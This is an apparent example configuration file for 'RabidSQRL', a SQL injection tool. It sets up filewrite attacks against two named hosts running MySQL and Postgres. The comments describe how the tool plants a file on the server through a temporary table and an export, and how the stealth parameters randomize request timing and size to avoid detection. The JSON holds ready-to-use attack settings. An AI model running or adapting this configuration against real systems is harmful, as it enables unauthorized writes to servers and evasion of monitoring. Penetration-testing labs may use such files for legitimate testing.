# This example is the filewrite attack against two
# machines, wvuln and smf-server. Note the configuration
# is nearly identical except for the base URL and the
# database parameter. (The database parameter needs to 
# be known ahead of time as RabidSQRL does not have
# database discovery capability. sqlmap can be used
# to discover the database for arbitrary sites.)
# 
# Note the URLs and SQL generated for this attack is not
# directly speficied. rabidsqrl knows the correct sql and
# sequence to use for which database.
#
# This configuration uses the optional stealth_*
# parameters. "interval" changes the interval at which 
# the requests are made of the server. "size" changes
# the size of the URL requested. 
#
# The stealth_* parameters can be any valid eval-able
# python code. (Assume the random module is imported.)
#
# The attack creates a randomly named table in the 
# database, writes the file data to it, the exports
# the table's data to a file on the server, then drops
# the table.
#
# Due to the different export functions in the different
# databases, the attack acts differently. On mysql if 
# the file already exists on the server, it will not 
# be overwritten. So the user should take precautions
# that the file does not exist already. (Future versions
# of rabidsqrl will give the user feedback if the file
# already exists.) On a postgres database the file will
# be overwritten so no precautions are needed.
#
[
    {
        "attack": "filewrite",
        "base_url": "http://wpvuln/wp-login.php",
        "attribute": "inline",
        "database": "mysql",
        "file_write": "/users/glawler/src/acs_attack/rabidsqrl/LICENSE",
        "file_dest": "/tmp/LICENSE",
        "stealth_interval": "random.normalvariate(1.25, 0.25)",
        "stealth_size": "random.randint(512,1425)"
    },
    {
        "attack": "filewrite",
        "base_url": "http://smf-server/forum/index.php",
        "attribute": "inline",
        "database": "postgres",
        "file_write": "/users/glawler/src/acs_attack/rabidsqrl/LICENSE",
        "file_dest": "/tmp/LICENSE",
        "stealth_interval": "random.normalvariate(1.25, 0.25)",
        "stealth_size": "random.randint(512,1425)"
    }
]
